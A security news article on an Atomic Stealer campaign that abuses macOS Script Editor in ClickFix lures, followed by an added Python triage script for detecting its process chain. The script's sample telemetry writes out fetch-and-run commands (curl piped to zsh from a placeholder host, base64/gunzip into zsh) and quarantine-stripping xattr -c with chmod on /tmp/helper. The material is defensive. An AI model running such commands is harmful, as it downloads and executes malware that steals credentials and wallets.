Atomic Stealer campaign abuses macOS Script Editor in ClickFix variation


A new malware campaign is targeting macOS users with Atomic Stealer, also known as AMOS, by abusing the built-in Script Editor app in a ClickFix-style attack that avoids Terminal prompts, according to a technical analysis from Jamf.

KEY FACTS

  • Delivery method: Fake Apple-themed pages use the applescript:// scheme to open Script Editor with malicious code.
  • Payload: The code launches an obfuscated curl | zsh command that fetches and runs a script in memory.
  • Final malware: The payload drops a Mach-O binary identified as Atomic Stealer.
  • Defense: macOS Tahoe 26.4 adds a warning when users try to execute Terminal commands in ClickFix attacks.

The campaign uses web pages that pose as guides for reclaiming disk space on a Mac. The pages show cleanup instructions, then trigger Script Editor with prefilled executable code.

The script runs a hidden chain that decodes a base64-encoded, gzip-compressed payload, downloads a file to /tmp/helper, strips the file's extended attributes with xattr -c (which removes the quarantine flag), marks it executable, and launches it. According to the report, the binary steals data from the Keychain, the desktop, browser wallets, autofill data, passwords, cookies, stored credit cards, and system information.
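The chain above leaves a recognisable trail in process telemetry: Script Editor spawning a shell, a base64/gunzip decode stage, curl piped into zsh, and xattr/chmod on a /tmp path. The following triage script, an added example that is not part of the article or of Jamf's analysis, scores such events against those indicators. The event records, the example.invalid URL and the PLACEHOLDER_B64 token are constructed for illustration; the indicator names and severity thresholds are the author's own assumptions, not a published detection rule.

```python
import re
from dataclasses import dataclass

@dataclass
class ProcessEvent:
    """One process-creation record: parent process name and full command line."""
    parent: str
    cmdline: str

# Parents that indicate the command came from the ClickFix lure rather than a user-typed Terminal session.
SCRIPT_EDITOR_PARENTS = {"Script Editor", "osascript"}

# Each indicator maps to one stage of the chain described in the report.
INDICATORS = [
    # curl output piped straight into a shell (fetch-and-run in memory)
    ("curl_pipe_shell", re.compile(r"\bcurl\b[^|]*\|\s*(zsh|sh|bash)\b")),
    # base64 decode followed by gzip decompression (the obfuscated payload stage)
    ("decode_gzip_chain", re.compile(r"\bbase64\b.*\b(gunzip|gzip\s+-d)\b")),
    # extended attributes (quarantine flag) stripped from a file in /tmp
    ("xattr_clear_tmp", re.compile(r"\bxattr\s+-c\s+/tmp/")),
    # a /tmp file marked executable
    ("chmod_exec_tmp", re.compile(r"\bchmod\s+\+x\s+/tmp/")),
]

SHELL_LAUNCH = re.compile(r"(/bin/)?(zsh|sh|bash)\b")

def analyze(event):
    """Return (severity, matched_indicators) for a single process event.

    Severity is 'high' for two or more indicators, 'medium' for one, 'none' otherwise.
    The thresholds are an assumption chosen for this example.
    """
    hits = []
    # Script Editor launching a shell is the entry point of the lure.
    if event.parent in SCRIPT_EDITOR_PARENTS and SHELL_LAUNCH.match(event.cmdline):
        hits.append("script_editor_shell")
    for name, pattern in INDICATORS:
        if pattern.search(event.cmdline):
            hits.append(name)
    if len(hits) >= 2:
        severity = "high"
    elif hits:
        severity = "medium"
    else:
        severity = "none"
    return severity, hits

# Constructed sample telemetry (not real captures). PLACEHOLDER_B64 stands in for the
# encoded blob; example.invalid is a reserved, non-resolving domain.
SAMPLE_EVENTS = [
    ProcessEvent("Script Editor", "/bin/zsh -c 'echo PLACEHOLDER_B64 | base64 -D | gunzip | zsh'"),
    ProcessEvent("Script Editor", '/bin/zsh -c "curl -fsSL https://example.invalid/helper | zsh"'),
    ProcessEvent("zsh", "/usr/bin/xattr -c /tmp/helper && chmod +x /tmp/helper && /tmp/helper"),
    ProcessEvent("Terminal", "/bin/zsh -l"),                                   # benign login shell
    ProcessEvent("Finder", "xattr -c /Users/alice/Downloads/report.pdf"),      # benign, not /tmp
]

def triage(events):
    """Score every event and return a list of (parent, severity, hits) tuples."""
    return [(e.parent, *analyze(e)) for e in events]

if __name__ == "__main__":
    for parent, severity, hits in triage(SAMPLE_EVENTS):
        print(f"{severity:6} parent={parent!r} hits={hits}")
```

The xattr and chmod checks are deliberately scoped to /tmp so that routine use of those tools on user files (the Finder example) does not fire; widen the path pattern only if your environment's telemetry shows the dropper landing elsewhere.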

Atomic Stealer has been used widely in recent ClickFix campaigns and last year gained a backdoor component for persistent access to compromised systems. Mac users are advised to treat Script Editor prompts as high-risk and to rely on official Apple documentation for troubleshooting.

WHY IT MATTERS

The campaign shows how attackers can shift from Terminal-based social engineering to a trusted built-in app to reach Mac users. It also highlights that even familiar troubleshooting prompts can be used to launch malware if users follow them without verifying the source.